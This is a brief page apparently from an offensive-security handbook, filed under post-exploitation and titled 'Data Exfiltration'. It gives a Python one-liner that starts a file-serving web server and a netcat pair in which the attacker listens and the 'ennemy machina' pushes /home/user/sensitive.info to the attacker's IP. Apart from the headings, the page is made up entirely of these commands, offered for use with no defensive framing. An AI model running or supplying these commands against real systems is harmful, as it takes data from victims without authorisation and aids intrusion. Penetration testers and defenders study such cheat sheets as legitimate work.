> For the complete documentation index, see [llms.txt](https://book.turbosec.net/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.turbosec.net/post-exploitation/data-exfiltration.md).

# Data Exfiltration

## Python

```
Python3 -m http.server 6969 #start a minimal web server to download files from
```

## Netcat

```
nc -vlp 9999 > loot #on your machina
nc -N your_ip 9999 < /home/user/sensitive.info #on ennemy machina
```
